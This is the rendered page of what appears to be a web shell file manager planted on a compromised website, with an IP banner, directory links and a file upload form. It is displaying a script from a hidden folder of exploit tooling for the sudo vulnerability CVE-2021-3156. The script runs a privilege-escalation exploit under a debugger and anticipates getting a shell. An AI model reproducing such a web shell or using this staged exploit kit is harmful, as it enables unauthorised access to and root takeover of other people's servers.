<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 18.218.150.169</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=/home">home</a>/<a href="?path=/home/bitrix">bitrix</a>/<a href="?path=/home/bitrix/ext_www">ext_www</a>/<a href="?path=/home/bitrix/ext_www/klimatlend.ua">klimatlend.ua</a>/<a href="?path=/home/bitrix/ext_www/klimatlend.ua/.hide">.hide</a>/<a href="?path=/home/bitrix/ext_www/klimatlend.ua/.hide/CVE-2021-3156">CVE-2021-3156</a>/<a href="?path=/home/bitrix/ext_www/klimatlend.ua/.hide/CVE-2021-3156/gdb">gdb</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : /home/bitrix/ext_www/klimatlend.ua/.hide/CVE-2021-3156/gdb/gdbexp.py</tr></td></table><br /><pre>#!/usr/bin/python3
'''
Client for tracing patched sudo. Don't forget to start server first before running this.

Running command:
python gdbexp.py exploit.py
'''
import subprocess
import sys
import time


if len(sys.argv) &lt; 2:
	print('Usage: %s &lt;exploit.py&gt; [args...]' % sys.argv[0])
	exit(1)

cmd = 'python'
if sys.version_info[0] == 3:
	cmd += '3'

FIFO_PATH = &quot;/tmp/gdbsudo&quot;

proc = subprocess.Popen([cmd] + sys.argv[1:], stdin=subprocess.PIPE, bufsize=0)
#time.sleep(0.5)

# send to gdber to start debugging
fifo = open(FIFO_PATH, &quot;w&quot;)
fifo.write(str(proc.pid))
fifo.close()
time.sleep(0.5)

# trigger enter, resume sudo
proc.stdin.write(b'\n')
proc.stdin.close() # close stdin to exit incase we get shell

ret = proc.wait()
print('exit code: %d' % ret)
</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>